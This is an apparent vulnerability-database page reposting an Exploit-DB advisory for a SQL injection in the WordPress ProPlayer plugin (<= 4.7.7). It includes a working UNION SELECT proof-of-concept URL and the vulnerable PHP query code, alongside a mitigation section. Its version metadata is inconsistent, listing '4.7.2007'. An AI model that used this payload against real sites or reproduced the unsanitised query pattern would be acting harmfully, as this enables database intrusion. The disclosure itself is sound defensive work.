ProPlayer plugin - exploit.company

vendor:

ProPlayer

by:

Miroslav Stampar

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ProPlayer

Affected Version From: 4.7.2007

Affected Version To: 4.7.2007

Patch Exists: NO

Related CWE: N/A

CPE: a:wordpress:proplayer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability

A SQL injection vulnerability exists in ProPlayer plugin version 4.7.7 and earlier. The vulnerability is due to the application not properly sanitizing user-supplied input to the 'pp_playlist_id' parameter in the 'playlist-controller.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the SQL query. It is recommended to use prepared statements, parameterized queries, or stored procedures when interacting with the database.

Source

Exploit-DB raw data:

# Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip
# Version: 4.7.7 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20

---------------
Vulnerable code
---------------
function getPlaylist($id = '') {
	$query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
	$playlistRow = mysql_fetch_row($query);
	
	return $this->withBackwardCompatibility($playlistRow[2]);
}

...

if (!empty($_GET["pp_playlist_id"])) {
	header("Content-type: application/xml");
	$xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);